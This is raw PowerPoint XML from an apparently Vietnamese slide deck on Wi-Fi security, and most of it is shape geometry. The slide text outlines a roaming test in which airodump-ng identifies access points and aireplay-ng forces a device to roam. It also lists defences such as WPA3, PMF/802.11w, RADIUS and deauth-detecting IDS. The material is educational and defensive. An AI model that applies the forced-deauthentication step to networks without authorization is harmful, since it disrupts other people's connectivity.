            <a:pPr marL="1468119" lvl="2" indent="-489373" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Nếu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không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có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cơ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chế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bảo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vệ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--&gt;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đề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xuất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sử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dụng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802.11w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399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hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399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WPA3-Enterprise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5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6844" y="584288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031852" y="7612475"/>
            <a:ext cx="1281972" cy="1327843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1281972" h="1327843">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1281972" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1281972" y="1327843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132784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572279" y="1497647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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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31360" y="914400"/>
            <a:ext cx="8425280" cy="105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dirty="0" err="1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Kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="62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6200" dirty="0" err="1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tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="62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 roaming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535919" y="2210183"/>
            <a:ext cx="15225006" cy="15209097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15225006" h="15209097">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15225006" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15225006" y="15209097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15209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28750" y="2649697"/>
            <a:ext cx="13430500" cy="541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75"/>
              </a:lnSpc>
            </a:pP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Mục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đích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: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Kiểm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tra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hiệu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suất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roaming (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chuyển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vùng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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7175"/>
              </a:lnSpc>
            </a:pP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Cách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thức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: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7175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 1.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Xác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định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AP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và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thiết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bị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(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airodump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-ng)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7175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 2. Theo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dõi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lưu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lượng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thiết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bị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(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airodump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-ng)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7175"/>
              </a:lnSpc>
            </a:pP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 3.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Ép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thiết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bị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roaming (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aireplay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-ng)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="7175"/>
              </a:lnSpc>
            </a:pP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Nếu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thiết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bị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kết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nối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vào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AP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manh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hơn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--&gt;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hỗ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5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trợ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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roaming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5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6844" y="925185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749880" y="7073742"/>
            <a:ext cx="1567173" cy="1623249"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1567173" h="1623249">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1567173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567173" y="1623249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16232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775779" y="925185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1453" y="2164893"/>
            <a:ext cx="12045093" cy="12032507"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12045093" h="12032507">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12045094" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12045094" y="12032507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12032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17128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25301" y="6340603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05221" y="51712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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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282515" y="914400"/>
            <a:ext cx="9722969" cy="1085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Phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6399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6399" dirty="0" err="1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chống</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6399" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA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26916" y="2377127"/>
            <a:ext cx="8821579" cy="578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4"/>
              </a:lnSpc>
            </a:pP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WPA3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7714"/>
              </a:lnSpc>
            </a:pP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PMF (Protected Management Frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7714"/>
              </a:lnSpc>
            </a:pP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Authentication </a:t>
            </a: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với</a:t>
            </a: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Radius Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7714"/>
              </a:lnSpc>
            </a:pP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IDS </a:t>
            </a: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phát</a:t>
            </a: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hiện</a:t>
            </a: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deauth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7714"/>
              </a:lnSpc>
            </a:pP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Detect Rouge AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7714"/>
              </a:lnSpc>
            </a:pP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Bảo </a:t>
            </a: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vệ</a:t>
            </a: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wifi</a:t>
            </a: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cá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800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800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nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sau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15337" y="2369070"/>
            <a:ext cx="949686" cy="574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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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1182" y="2786323"/>
            <a:ext cx="15941734" cy="15925076"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15941734" h="15925076">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15941734" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15941734" y="15925076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15925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39800" y="9606950"/>
            <a:ext cx="1444864" cy="1381815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1444864" h="1381815">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1444865" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1444865" y="1381815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1381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87657" y="8415018"/>
            <a:ext cx="6419980" cy="4667685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6419980" h="4667685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6419980" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6419980" y="4667686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4667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6619" y="470324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6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18296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12329" y="8415018"/>
            <a:ext cx="7004411" cy="5934646"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7004411" h="5934646">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7004411" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7004411" y="5934647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5934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37571" y="6624732"/>
            <a:ext cx="1944168" cy="2013734"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1944168" h="2013734">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1944168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944168" y="2013734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20137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19617" y="8801641"/>
            <a:ext cx="6567749" cy="6508042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6567749" h="6508042">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6567749" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6567749" y="6508042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65080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18196" y="-132643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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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384883" y="8638466"/>
            <a:ext cx="6921188" cy="4542816"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6921188" h="4542816">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6921187" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6921187" y="4542816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="454281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47215">
            <a:off x="141295" y="9232286"/>
            <a:ext cx="2077313" cy="1257718"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2077313" h="1257718">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2077313" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2077313" y="1257718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125771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387366" y="9402650"/>
            <a:ext cx="3701668" cy="3778632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3701668" h="3778632">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3701668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3701668" y="3778632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="377863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741415" y="9606950"/>
            <a:ext cx="2873092" cy="3078647"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2873092" h="3078647">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2873092" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873092" y="3078647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30786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734687" y="218662"/>
            <a:ext cx="12818626" cy="221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WPA3</a:t>
            </a:r>
          </a:p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(Wi-Fi Protected Access)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0118" y="3213246"/>
            <a:ext cx="14863862" cy="528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sz="3185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Bao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185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gồm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687757" lvl="1" indent="-343879" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185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WPA3-Personal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185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sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185" b="1" dirty="0" err="1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dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3185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 Simultaneous Authentication of Equals (SAE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687757" lvl="1" indent="-343879" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185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WPA3-Enterprise:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1375514" lvl="2" indent="-458505" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185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Protected Management Frames (PMF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1375514" lvl="2" indent="-458505" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185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TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1375514" lvl="2" indent="-458505" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185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TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1375514" lvl="2" indent="-458505" algn="l">
              <a:lnSpc>
                <a:spcPts val="5988"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3185" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="449FA2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TLS_DHE_RSA_WITH_AES_256_GCM_SHA384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7683" y="9467457"/>
            <a:ext cx="1422684" cy="1360603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1422684" h="1360603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1422684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422684" y="1360603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1360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03886" y="8293823"/>
            <a:ext cx="6321425" cy="4596030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6321425" h="4596030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6321425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6321425" y="4596030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4596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88483" y="8293823"/>
            <a:ext cx="6896884" cy="5843542"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6896884" h="5843542">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6896884" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6896884" y="5843542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="584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60134" y="8674510"/>
            <a:ext cx="6466926" cy="6408135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6466926" h="6408135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6466926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6466926" y="6408136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6408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87714" y="8513840"/>
            <a:ext cx="6814939" cy="4473078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6814939" h="4473078">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6814939" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6814939" y="4473078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4473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47215">
            <a:off x="815035" y="9098544"/>
            <a:ext cx="2045423" cy="1238411"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2045423" h="1238411">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2045424" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045424" y="1238411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1238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27060" y="9266293"/>
            <a:ext cx="3644843" cy="3720625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3644843" h="3720625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3644842" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3644842" y="3720625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37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329186" y="9467457"/>
            <a:ext cx="2828987" cy="3031386"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2828987" h="3031386">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2828986" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828986" y="3031385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30313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410106" y="2716960"/>
            <a:ext cx="9186279" cy="5752907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9186279" h="5752907">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9186279" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9186279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44425" y="2716960"/>
            <a:ext cx="7686358" cy="5752907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7686358" h="5752907">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7686358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7686358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1700" y="249031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4000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634000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91615" y="785978"/>
            <a:ext cx="1690477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Protected Management Frames (PMF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1180506">
            <a:off x="15582089" y="-1277514"/>
            <a:ext cx="3717374" cy="3129352"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4245249" h="3573727">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4245248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245248" y="3573727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="357372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58172" y="7291096"/>
            <a:ext cx="1694267" cy="1552565"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1694267" h="1552565">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1694268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694268" y="1552565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="155256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28474">
            <a:off x="-363619" y="-25629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1615" y="819150"/>
            <a:ext cx="1690477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Protected Management Frames (PMF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8887683" y="9467457"/>
            <a:ext cx="1422684" cy="1360603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1422684" h="1360603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1422684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422684" y="1360603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1360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03886" y="8293823"/>
            <a:ext cx="6321425" cy="4596030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6321425" h="4596030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6321425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6321425" y="4596030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4596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88483" y="8293823"/>
            <a:ext cx="6896884" cy="5843542"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6896884" h="5843542">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6896884" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6896884" y="5843542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58435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60134" y="8674510"/>
            <a:ext cx="6466926" cy="6408135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6466926" h="6408135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6466926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6466926" y="6408136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6408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87714" y="8513840"/>
            <a:ext cx="6814939" cy="4473078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6814939" h="4473078">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6814939" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6814939" y="4473078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4473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47215">
            <a:off x="815035" y="9098544"/>
            <a:ext cx="2045423" cy="1238411"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2045423" h="1238411">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2045424" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045424" y="1238411"/>
                </a:lnTo>
                <a:lnTo>
